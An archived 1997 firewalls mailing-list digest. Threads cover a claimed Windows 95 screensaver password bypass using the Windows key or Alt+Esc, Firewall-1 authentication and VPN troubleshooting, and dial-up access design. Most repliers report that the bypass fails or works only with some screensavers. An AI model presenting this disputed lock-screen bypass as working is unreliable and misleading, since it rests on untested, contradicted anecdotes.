by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id UAA18679 for ; Tue, 14 Jan 1997 20:20:04 -0800 (PST) Received: from jeffs-computer (hd81-116.compuserve.com [199.174.253.116]) by m4.sprynet.com (8.6.12/8.6.12) with SMTP id UAA25514 for ; Tue, 14 Jan 1997 20:17:08 -0800 Message-ID: <32DC5CF5.3CE8@sprynet.com> Date: Tue, 14 Jan 1997 22:28:37 -0600 From: Seale Reply-To: jseale@sprynet.com X-Mailer: Mozilla 3.01Gold (Win95; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: Re: WIN'95 FLAW References: <3.0.32.19970114145623.006882b0@202.190.59.4> <32DC40B0.18FB@hitel.kol.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk sklee wrote: > > PaLaN wrote: > > > > Howdy, > > > > I juz encountered a security (i would call it) flaw in M$ Windows'95 > > screensaver !! I don't know anyone of you encountered this or not but here > > it goes : > > > > If the Windows'95 Screen saver is active, you can break into without any > > password and all you have to do is : press the "windows" logo key (printed > > on the M$ keyboard) and there you are. > > > > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > > tried this with my own PC and my friends. It works.....try on your own PC. > > > > Hmmm....M$ still the "King Of Buggy" err...i don't intend to flame M$ here > > ok..! Let me know if anyone of you encountered this. > > > > I'm goin to send M$ a mail on this bug but before that, I need to know > > whether any patch available for this...thx. > > > > rgds, > > PaLaN > > Good !!!!! > > M$ is crazy boy..... > > I will try that screen saver start and i put Ctrl+Alt+Delete and > i kill screen saver ....that is killed...:-) Killed? True Windows95 screen savers do not exit with Ctrl+Alt+Del. If this was just a joke at the end, sorry. But if not, then take the above line to knowledge. Will Seale (new) Jseale@sprynet.com PS That Alt+Esc Didn't work either. From firewalls-owner Wed Jan 15 00:04:02 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA22967 for firewalls-outgoing; Tue, 14 Jan 1997 21:15:39 -0800 (PST) Received: from balut.admu.edu.ph (balut.admu.edu.ph [165.220.4.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id VAA22927 for ; Tue, 14 Jan 1997 21:15:03 -0800 (PST) Received: by balut.admu.edu.ph; (5.65v3.2/1.1.8.2/17Sep96-1010AM) id AA23445; Wed, 15 Jan 1997 13:19:28 -0800 Date: Wed, 15 Jan 1997 13:19:28 -0800 (GMT-0800) From: Jarn Calubiran <920145@balut.admu.edu.ph> To: firewalls@greatcircle.com Subject: Firewalls for dial-up access Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I apologize beforehand if I missed a discussion on this but most of the things I've been hearing from this list concern protecting the network from the outside. How about protecting the network from the inside in the case where you have dial-up lines into your network. I am aware that some dial-up servers perform strong authentication but what if you really want the dial-up access to be essentially "isolated" from the network. How is this implemented. Thanks in advance... From firewalls-owner Wed Jan 15 00:04:05 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA21918 for firewalls-outgoing; Tue, 14 Jan 1997 21:04:58 -0800 (PST) Received: from gateway.continuum.co.nz (gateway.cscnz.co.nz [202.22.0.74]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id VAA21899 for ; Tue, 14 Jan 1997 21:04:40 -0800 (PST) Received: (from smap@localhost) by gateway.continuum.co.nz (8.6.9/8.6.9) id RAA16962; Wed, 15 Jan 1997 17:16:28 GMT Received: from thor.cscnz.co.nz(202.22.1.215) by gateway via smap (V1.3) id sma016956; Wed Jan 15 17:16:24 1997 Received: by thor.cscnz.co.nz (SMI-8.6/SMI-SVR4) id SAA01548; Wed, 15 Jan 1997 18:02:17 +1300 Date: Wed, 15 Jan 1997 18:02:17 +1300 From: geofft@thor (Geoff Tribble) Message-Id: <199701150502.SAA01548@thor.cscnz.co.nz> To: palan@dataprep.com.my Subject: Re: WIN'95 FLAW Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> > If the Windows'95 Screen saver is active, you can break into without any > password and all you have to do is : press the "windows" logo key (printed > on the M$ keyboard) and there you are. > > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > tried this with my own PC and my friends. It works.....try on your own PC. > Do you have Service Pack One loaded ?? Seems that this may fix the problem. Also CTRL+ALT+DEL with 16 bit screen savers will kill the screen-saver Use a 32 bit screen saver Geoff Tribble CSC New Zealand From firewalls-owner Wed Jan 15 00:04:36 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA00974 for firewalls-outgoing; Tue, 14 Jan 1997 22:23:36 -0800 (PST) Received: from natashya.eden.com (natashya.eden.com [199.171.21.14]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id WAA00944 for ; Tue, 14 Jan 1997 22:23:20 -0800 (PST) Received: from crunch1 (crunch.eden.com [199.171.21.46]) by natashya.eden.com (8.8.3/8.8.1) with ESMTP id AAA15375; Wed, 15 Jan 1997 00:19:36 -0600 (CST) Message-Id: <199701150619.AAA15375@natashya.eden.com> From: "crunch" To: "Michael Cruz" , , "Gunnar Ingvi Thorisson" Cc: , Subject: Re: Re[2]: WIN'95 FLAW Date: Wed, 15 Jan 1997 00:18:05 -0600 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk yeah, no doubt... "duh... let's break into a WIN95 WORKSTATION through the SCREENSAVER... woah... we are soooo cool... " Can we get back to security? crunch crunch@eden.com crunch@geocities.com http://www.eden.com/~crunch http://www.geocities.com/SiliconValley/1189/ http://www.angelfire.com/tx/crunchfactory/index.html ---------- > From: Michael Cruz > To: palan@dataprep.com.my; Gunnar Ingvi Thorisson > Cc: firewalls@greatcircle.com; sneakers@CS.YALE.EDU > Subject: Re[2]: WIN'95 FLAW > Date: Tuesday, January 14, 1997 2:27 PM > > I thought this was the FIREWALL mailing list. > > mike > > ______________________________ Reply Separator _________________________________ > Subject: Re: WIN'95 FLAW > Author: gunni@if.is (Gunnar Ingvi Thorisson) at *Internet* > Date: 1/14/97 8:14 AM > > > > I juz encountered a security (i would call it) flaw in M$ Windows'95 > > screensaver !! I don't know anyone of you encountered this or not but here > > it goes : > > > > If the Windows'95 Screen saver is active, you can break into without any > > password and all you have to do is : press the "windows" logo key (printed > > on the M$ keyboard) and there you are. > > > > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > > tried this with my own PC and my friends. It works.....try on your own PC. > > This does not work for me, I've not tried to switch over to the English > keyboard yet (I'm using Icelandic). > > Gunni > gunni@if.is > gunni@coda.is From firewalls-owner Wed Jan 15 00:13:42 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA09660 for firewalls-outgoing; Tue, 14 Jan 1997 18:09:05 -0800 (PST) Received: from palrel3.hp.com (palrel3.hp.com [15.253.88.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id SAA09642 for ; Tue, 14 Jan 1997 18:08:47 -0800 (PST) From: ANDY_HIMAWAN@Non-HP-Indonesia-om1.om.hp.com Received: from hpsx1.indo.hp.com (root@hpsx1.indo.hp.com [15.59.169.1]) by palrel3.hp.com with SMTP (8.7.5/8.7.3) id SAA28960 for ; Tue, 14 Jan 1997 18:07:43 -0800 (PST) Received: from by hpsx1.indo.hp.com with SMTP (1.38.193.5/15.5+ECS 3.4 Openmail) id AA11202; Wed, 15 Jan 1997 09:07:21 +0700 X-Openmail-Hops: 1 Date: Wed, 15 Jan 97 09:06:54 +0700 Message-Id: Subject: HTTP Authentication To: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Item Subject: Message text Hello everybody, I have few questions when installing FW-1 Ver 2.1a running on HPUX Rel. 10.01 series 700. 1. This is the rule base : source destination service action track anyusers@any any HTTP User Authentication Long I have set the proxy from the client machine with the Firewall's IP Address. and then the dialog authentication shows up, and I fill in the username= "andy" and password ="andy", and from the browser shows an error message : Error 407 FW-1 at Firewall : Unauthorized to access the document. . Authorization is needed for Fw-1 . The authentication required by Fw-1 for andy is : unix password . Reason for failure of last attempt : fw-1 rule. From the book "Firewall Architecture and admin", It says that the firewall-1 password was correct, but the user was not authorized because there was no matching rule in the rule base. So ? Anybody know the solution, if we get an error message like that ? 2. From the log file, The HTTP service is accepted bye the firewall (green color), but below that log statement, the firewall shows a reject statement (red color), and it is rejected bye the daemon. This is the log statement : I/F Action SRC DST Rule Port Info Len 0 HTTP client firewall 3 1288 len 44 Daemon reject symbol - - - - - The question is, what do the daemon do ? Why do the daemon show the reject symbol ? 3. Same rule base like no. 1, I compile the rule base, and the firewall machine show the " Install Security Policy" Dialog, and I have choosen the gateway bye pressing "Apply button", and the question are : a. There is an error message : ..... compiled ok. ---> "Host Addr (Firewall) failed." ---> "Authentication For command refresh failed" load firewall ...... succedded What does it mean ? b. It usually takes short time when compile the rule base without HTTP Authentication. But It is rather strange, why it takes longer time when using HTTP Authentication? 4. There is an error message too, from the XTerminal : "XView warning menu_show : unable to grab pointer (command menu package) XView warning menu_show : unable to grab keyboard (command menu package) What does it mean ? 5. Do the Fw-1 support for FTP service , using anonymous login ? FYI, I try using FTP2000, WSFTP, but It always fail. I say thank you very much for the solution answering all the questions. Best regards, Andy From firewalls-owner Wed Jan 15 01:33:29 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA12844 for firewalls-outgoing; Wed, 15 Jan 1997 00:16:55 -0800 (PST) Received: from mail.rijnhaave.nl (mail.rijnhaave.nl [194.151.56.21]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA12803 for ; Wed, 15 Jan 1997 00:15:49 -0800 (PST) Received: from frank.rijnhaave.nl (alfa.rijnhaave.nl [194.151.56.61]) by mail.rijnhaave.nl (8.7.5/8.7.3) with SMTP id JAA04862; Wed, 15 Jan 1997 09:13:16 +0100 (MET) Message-Id: <3.0.32.19970115091238.0069928c@mail.rijnhaave.nl> X-Sender: frank@mail.rijnhaave.nl X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Wed, 15 Jan 1997 09:12:44 +0100 To: palan@dataprep.com.my From: Frank Schuurman Subject: Re: WIN'95 FLAW Cc: firewalls@GreatCircle.COM, diederik.quant@sanderink.nl, ernst.haaksman@sanderink.nl Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 02:56 PM 1/14/97 -0800, you wrote: Hi, I use the 400.950 UK version of win95 >If the Windows'95 Screen saver is active, you can break into without any >password and all you have to do is : press the "windows" logo key (printed >on the M$ keyboard) and there you are. This works only with third party screensavers for me. The 'flying windows' is only responding with the password dialog box. >If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have >tried this with my own PC and my friends. It works.....try on your own PC. Just the same story as above. >Unfortunately, this flaw can be found in M$ Windows NT as well, both >SERVER and WORKSTATION (it works with any screen saver, even >those that do not ship with the product.) I would also be interested in >any known patch or fix, as I just started deploying NT throughout my >enterprise! With versions of NT ? 3.5x or 4.x..... >I will try that screen saver start and i put Ctrl+Alt+Delete and >i kill screen saver ....that is killed...:-) Even that will only work for me with third party screen savers. Gr. Frank -------------------------------------------------------------------- Frank Schuurman | Private Internet Technical Proffessional | | Syntegra Internet Services | fschuurman@compuserve.com Louis Braillelaan 6 | 100276.2570@compuserve.com 2719 EJ Zoetermeer | frank@spid.xs4all.nl Tel : 079-368 22 22 | frank.schuurman@pi.net Fax : 079-368 24 18 | fs@sanderink.nl Email: frank.schuurman@syntegra.net | -------------------------------------------------------------------- From firewalls-owner Wed Jan 15 01:41:00 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA07220 for firewalls-outgoing; Tue, 14 Jan 1997 23:20:36 -0800 (PST) Received: from glacier.wise.edt.ericsson.se (glacier-ext.wise.edt.ericsson.se [193.180.251.38]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id XAA07185 for ; Tue, 14 Jan 1997 23:20:24 -0800 (PST) Received: from daniels.nmac.ericsson.se (daniels.nmac.ericsson.se [130.100.187.35]) by glacier.wise.edt.ericsson.se (8.7.5/8.7.3/glacier-0.9) with SMTP id IAA00235 for ; Wed, 15 Jan 1997 08:19:10 +0100 (MET) Received: from negrita. by daniels.nmac.ericsson.se (SMI-8.6/SMI-SVR4) id IAA04939; Wed, 15 Jan 1997 08:17:26 +0100 Received: by negrita. (SMI-8.6/SMI-SVR4) id IAA02352; Wed, 15 Jan 1997 08:19:08 +0100 Date: Wed, 15 Jan 1997 08:19:08 +0100 From: etxrosd@nmac.ericsson.se (Robert Stahlbrand) Message-Id: <199701150719.IAA02352@negrita.> To: firewalls@GreatCircle.COM Subject: Re: WIN'95 FLAW Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-MD5: wD9oOqKgKx/DBuubXEPXPg== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It does not work for me either! It's not very likely that M$ would implement such an easy way to bypass the password-protected screensaver in W95. I never heard of it before and this kind of stuff usually leaks out to the masses very fast. "windows" logo-key and ALT+ESC is two of the first things I would try (and probably did a year ago) and the fact that noone tried this before isn't very likely! Am I wrong? /Robert ########################################################### # Robert Stahlbrand # # Network and System Administrator OPLab and NMAC domains # # # # Ericsson Telecom AB # # Box 333 # # 43184 Molndal # # Sweden # # +46 31 676162 # # # # robert@nmac.ericsson.se # ########################################################### > > I juz encountered a security (i would call it) flaw in M$ Windows'95 > > screensaver !! I don't know anyone of you encountered this or not but here > > it goes : > > > > If the Windows'95 Screen saver is active, you can break into without any > > password and all you have to do is : press the "windows" logo key (printed > > on the M$ keyboard) and there you are. > > > > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > > tried this with my own PC and my friends. It works.....try on your own PC. > > This does not work for me, I've not tried to switch over to the English > keyboard yet (I'm using Icelandic). > From firewalls-owner Wed Jan 15 03:18:59 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA28852 for firewalls-outgoing; Wed, 15 Jan 1997 02:33:25 -0800 (PST) Received: from gk-blue.unicc.org (gk-red.unicc.org [192.91.247.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id CAA28801 for ; Wed, 15 Jan 1997 02:33:01 -0800 (PST) From: admin@unicc.org Received: by gk-blue.unicc.org; (5.65v3.2/1.3/10May95) id AA27472; Wed, 15 Jan 1997 11:34:17 +0100 Received: by gh-old.unicc.org (5.65/jsb-190694); id AA13710; Wed, 15 Jan 1997 11:34:06 +0100 Message-Id: <9701151034.AA13710@gh-old.unicc.org> To: firewalls@greatcircle.com Subject: Other VPN products Date: Wed, 15 Jan 97 11:34:00 +0100 X-Mts: smtp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm looking for more information on available VPN products. I implemented AltaVista Tunnel and think it's a good product, but still would like to be sure that I didn't miss any better offer. Did anybody try any other solutions? Thanks, Lilia From firewalls-owner Wed Jan 15 08:39:21 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA00282 for firewalls-outgoing; Tue, 14 Jan 1997 15:33:21 -0800 (PST) Received: from panix3.panix.com (panix3.panix.com [198.7.0.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id PAA01560 for ; Tue, 14 Jan 1997 15:13:24 -0800 (PST) Received: from localhost (fangyou2@localhost) by panix3.panix.com (8.8.4/8.7/PanixU1.3) with SMTP id SAA16086; Tue, 14 Jan 1997 18:13:15 -0500 (EST) Date: Tue, 14 Jan 1997 18:13:14 -0500 (EST) From: FaNgYoU2 Reply-To: FaNgYoU2 To: "John H. Stewart" cc: firewalls@GreatCircle.com Subject: Re: McCaffee PC Firewall In-Reply-To: <199701132003.MAA02314@bounty.sssd.navy.mil> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > You wrote: > > ... Several of the Intranets where I have done > > performance tuning had a need for something like a PC firewall in > > areas of higher level administration, budget and finance ... > ... > Even having it installed on a separate PC begs the question of Why? > Elsewhere on the network, a corporate firewall exists. Why add a > backdoor?? > A lot of strange stuff shows up when I do performance tuning on networks. The owners usually have no idea of all the stuff that is running on there. Several times I have seen and traced what can be politely called corporate espionage. The Intranets I work on typically have good firewalls between themselves and the Internet and nobody is coming in from the Internet. The problem is with people who got access to the internal network through some legitimate avenue. The internal firewall on a PC would not be connected to anything except the corporate LAN. The firewall software would protect the data inside the PC (Windows 95, Windows NT Workstation) from other people on the corporate LAN who are trying to get into it. The people who own networks where I see this need for a PC firewall can easily afford dual Pentium processors, 128 MB RAM and 5 to 8 gigabytes of disk space. The data stored in the PC would be highly sensitive political, economic or financial data. The first attempt at an agency budget projection, for example. So the impact of the firewall software on the PC is not a major performance factor for the owner. A department that doesn't have any sensitive stuff might use an equivalent PC as a server. ^ ^ A slight gray shadow on a misty day, against a gray winter sky From firewalls-owner Wed Jan 15 09:21:27 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA06360 for firewalls-outgoing; Wed, 15 Jan 1997 03:54:03 -0800 (PST) Received: from mail.fluidsysuk.epcorp.com (stuka.epcorp.com [194.216.7.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA06288 for ; Wed, 15 Jan 1997 03:53:15 -0800 (PST) Received: from roamingpc.fluidsysuk.epcorp.com by mail.fluidsysuk.epcorp.com id aa00688; 15 Jan 97 11:45 GMT Message-Id: <3.0.32.19970115064812.00691cac@hurry.fluidsysuk.epcorp.com> X-Sender: martinw@hurry.fluidsysuk.epcorp.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Wed, 15 Jan 1997 06:48:13 -0500 To: firewalls@greatcircle.com From: "Martin C. Walker" Subject: ANYONE RUNNING FW-1 VPN PLEASE CONTACT ME !!!!! Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If anyone out there is running FW-1 VPN on any platform please let me know what platform. Also, if you're running VPN and NAT please, please let me know. I have a few questions (see earlier mail). From firewalls-owner Wed Jan 15 09:26:49 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA08891 for firewalls-outgoing; Wed, 15 Jan 1997 04:31:11 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA08826 for ; Wed, 15 Jan 1997 04:30:31 -0800 (PST) Received: from big-dogs.cisco.com ([171.68.53.75]) by lint.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id EAA20540; Wed, 15 Jan 1997 04:28:49 -0800 (PST) Message-Id: <3.0.32.19970115072847.006ac320@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Wed, 15 Jan 1997 07:28:52 -0500 To: Jarn Calubiran <920145@balut.admu.edu.ph> From: Paul Ferguson Subject: Re: Firewalls for dial-up access Cc: firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 01:19 PM 1/15/97 -0800, Jarn Calubiran wrote: > > I apologize beforehand if I missed a discussion on this but most >of the things I've been hearing from this list concern protecting the >network from the outside. How about protecting the network from the inside >in the case where you have dial-up lines into your network. I am aware >that some dial-up servers perform strong authentication but what if you >really want the dial-up access to be essentially "isolated" from the >network. How is this implemented. > > Thanks in advance... Convential wisdom indicates that dial-up access is located adjacent to the internal network, behind the firewall, and security is provided by authorization, authentication, one-time passwords, and perhaps even call-back. - paul -- Paul Ferguson || || Consulting Engineering || || Herndon, Virginia USA |||| |||| tel: +1.703.397.5938 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Wed Jan 15 09:40:04 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA06361 for firewalls-outgoing; Wed, 15 Jan 1997 03:54:06 -0800 (PST) Received: from mail.fluidsysuk.epcorp.com (stuka.epcorp.com [194.216.7.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA06266 for ; Wed, 15 Jan 1997 03:53:07 -0800 (PST) Received: from roamingpc.fluidsysuk.epcorp.com by mail.fluidsysuk.epcorp.com id aa00674; 15 Jan 97 11:42 GMT Message-Id: <3.0.32.19970115064542.00691cac@hurry.fluidsysuk.epcorp.com> X-Sender: martinw@hurry.fluidsysuk.epcorp.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Wed, 15 Jan 1997 06:45:44 -0500 To: firewalls@greatcircle.com From: "Martin C. Walker" Subject: FW-1 VPN Doesn't Work (Checkpoint and Sun stumped) anyone help ? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi All ! Blimey ! FW-1 has more bugs than sendmail ;-> Well, ok maybe not THAT many ! Anyway I'm in dire need of help ! I'm over here in jolly old England deploying a 2nd FW-1/Solaris x86 machine. FW-1 is 2.1a (Suns latest release) and solaris 2.5.1 x86. We cannot get the firewall here and the (same) one in the US to exchange keys. Each machine is set up as it's own CA (ie FW-A CA defined as "local" on FW-A and "remote, FW-B" on FW-B. FW-B is setup in the same fashion). I can get both CA keys exchanged. I can get ONE machine to send its encryption key to the other, but I can't get the final encryption key exchanged. Instead I get "Certificate Authority (FW-A) does not have key defined for FW-A". We are running a VERY simple NAT configuration, one rule which just hides everything behind the EXTERNAL addess of the respective firewall. The rule base is "any, any, any accept" - can't be much simpler than that. If anyone has any ideas pls let me know.....btw I am sure this is NOT a config problem but if you have any idea... I spent ALL YESTERDAY on the phone with the best suppt person sun has to offer and sone guy from checkpoint too....they were stumped (and my bloody ear hurts too from the phone :-() I'd also like to hear from ANYONE who is running VPN and NAT with FW-1 on any platform, Sun and Checkpoint as much as told me that NO-ONE is doing it on my platform, they certainly didn't test it ! From firewalls-owner Wed Jan 15 19:31:35 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA07767 for firewalls-outgoing; Wed, 15 Jan 1997 04:13:35 -0800 (PST) Received: from glacier.wise.edt.ericsson.se (glacier-ext.wise.edt.ericsson.se [193.180.251.38]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA07618 for ; Wed, 15 Jan 1997 04:12:22 -0800 (PST) Received: from daniels.nmac.ericsson.se (daniels.nmac.ericsson.se [130.100.187.35]) by glacier.wise.edt.ericsson.se (8.7.5/8.7.3/glacier-0.9) with SMTP id NAA00182 for ; Wed, 15 Jan 1997 13:11:19 +0100 (MET) Received: from negrita. by daniels.nmac.ericsson.se (SMI-8.6/SMI-SVR4) id NAA05317; Wed, 15 Jan 1997 13:09:33 +0100 Received: by negrita. (SMI-8.6/SMI-SVR4) id NAA02544; Wed, 15 Jan 1997 13:11:16 +0100 Date: Wed, 15 Jan 1997 13:11:16 +0100 From: etxrosd@nmac.ericsson.se (Robert Stahlbrand) Message-Id: <199701151211.NAA02544@negrita.> To: firewalls@greatcircle.com Subject: Re: HTTP Authentication Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-MD5: +VMIWDHXJTpvVrx4On4XsA== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi there! This is my guesses... > Item Subject: Message text > Hello everybody, > > > I have few questions when installing FW-1 Ver 2.1a running on HPUX Rel. > 10.01 series 700. > > 1. This is the rule base : > > source destination service action track > anyusers@any any HTTP User Authentication Long > Funny rule. Just for test I suppose.... > > I have set the proxy from the client machine with the Firewall's IP > Address. and then the dialog authentication shows up, and I fill in > the > > username= "andy" and password ="andy", and from the browser shows an > error message : > > Error 407 > FW-1 at Firewall : Unauthorized to access the document. > . Authorization is needed for Fw-1 > . The authentication required by Fw-1 for andy is : unix password > . Reason for failure of last attempt : fw-1 rule. > > From the book "Firewall Architecture and admin", It says that the > firewall-1 password was correct, but the user was not authorized > because there was no matching rule in the rule base. > > So ? Anybody know the solution, if we get an error message like that > ? > Have you inserted the web-servers address in "properties", "authentication", HTTP-servers? If not, it won't work. > > 2. From the log file, The HTTP service is accepted bye the firewall > (green > color), but below that log statement, the firewall shows a reject > > statement (red color), and it is rejected bye the daemon. > > This is the log statement : > > I/F Action SRC DST Rule Port Info > Len 0 HTTP client firewall 3 1288 len 44 > Daemon reject symbol - - - - - > > The question is, what do the daemon do ? Why do the daemon show the > > reject symbol ? It's a two step procedure! The user is accepted by the proxy (the users andy exists on the proxy with UNIX-authentication) but he just don't which web-server to contact! The firewall needs to have a list on valid firewalls in the system (see above). > > 3. Same rule base like no. 1, > > I compile the rule base, and the firewall machine show the " Install > > > Security Policy" Dialog, and I have choosen the gateway bye pressing > > "Apply button", and the question are : > > a. There is an error message : > ..... > compiled ok. > ---> "Host Addr (Firewall) failed." > ---> "Authentication For command refresh failed" > load firewall ...... succedded > > What does it mean ? > I don't know! > b. It usually takes short time when compile the rule base without > HTTP > Authentication. But It is rather strange, why it takes longer > time > when using HTTP Authentication? This is strange! I don't notice any delay on my firewall! It most be the HP-UX unix system. It sucks! (this was a joke) > > 4. There is an error message too, from the XTerminal : > > "XView warning menu_show : unable to grab pointer (command menu > package) > XView warning menu_show : unable to grab keyboard (command menu > package) > > What does it mean ? > I have seen it a lot but never done anything against it! Does it appear frequently? > > 5. Do the Fw-1 support for FTP service , using anonymous login ? > FYI, I try using FTP2000, WSFTP, but It always fail. > > No, I does not support anonymous ftp as a special case but of course it supports ftp. Anonymous ftp is just a special case of ftp (same port) and can be created on any UNIX-system with not very much work. What you need to do is to create a special account on the UNIX-system you deal with called ftp with no password and a lot more. See manpages on ftpd. It includes a bourne-shell scripts which is very useful when creating the anonymous ftp-server. And of course, you cannot have any user authentication in your firewall for ftp! > > > > I say thank you very much for the solution answering all the questions. > > > > Best regards, > > Andy > From firewalls-owner Wed Jan 15 19:32:45 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA03629 for firewalls-outgoing; Wed, 15 Jan 1997 03:24:23 -0800 (PST) Received: from sunphil.sunphil.mozcom.com (sunphil.mozcom.com [206.151.138.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA03608 for ; Wed, 15 Jan 1997 03:23:57 -0800 (PST) Received: by sunphil.sunphil.mozcom.com (SMI-8.6/SMI-SVR4) id TAA22964; Wed, 15 Jan 1997 19:21:50 -0800 Date: Wed, 15 Jan 1997 19:21:50 -0800 From: drexx@sunphil.mozcom.com (Dexter D. Laggui) Message-Id: <199701160321.TAA22964@sunphil.sunphil.mozcom.com> To: firewalls@greatcircle.com Subject: Re: WIN'95 FLAW X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello world, Jan. 15, '97 (07:21 pm, Manila time) This does not work for us. We tested it on the M$ Win 95 and the NT Server 3.51 using the ALT+ESC combo. What version do you refer to? I wish it's all true for me );^] The Drexxman. "It's a dirty job, but somebody's gotta do it." -- John Wayne ~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~ ______ /_____/\ DEXTER D. LAGGUI /_____\\ \ Systems Engineer, Systems Integration Division /_____\ \\ / PHILIPPINE SYSTEMS PRODUCTS INC. /_____/ \/ / / Penthouse, Corporate Business Center /_____/ / \//\ 150 Paseo de Roxas Ave., Legaspi Village \_____\//\ / / Makati City, Philippines \_____/ / /\ / \_____/ \\ \ Phone: (++632) 813-6453 to 55 loc. 222 \_____\ \\ Fax: (++632) 813-3516 \_____\/ Email: drexx@sunphil.mozcom.com ~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~ || Subject: WIN'95 FLAW || Author: PaLaN at INTERNET-MAIL || Date: 1/14/97 2:56 PM || || || Howdy, || || I juz encountered a security (i would call it) flaw in M$ Windows'95 || screensaver !! I don't know anyone of you encountered this or not but here || it goes : || || If the Windows'95 Screen saver is active, you can break into without any || password and all you have to do is : press the "windows" logo key (printed || on the M$ keyboard) and there you are. || || If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have || tried this with my own PC and my friends. It works.....try on your own PC. || || Hmmm....M$ still the "King Of Buggy" err...i don't intend to flame M$ here || ok..! Let me know if anyone of you encountered this. || || I'm goin to send M$ a mail on this bug but before that, I need to know || whether any patch available for this...thx. || || || rgds, || PaLaN || || || From firewalls-owner Wed Jan 15 19:33:36 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA20251 for firewalls-outgoing; Wed, 15 Jan 1997 08:02:48 -0800 (PST) Received: from gw.lsli.com (gw.lsli.com [206.50.87.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA20234 for ; Wed, 15 Jan 1997 08:02:31 -0800 (PST) From: firstcat@lsli.com Received: by gw.lsli.com id AA24273; Wed, 15 Jan 1997 09:56:20 -0600 Received: by lsli.com via smwrap Version 2.2 id smwrapWc8Ac5; Wed Jan 15 09:55:26 1997 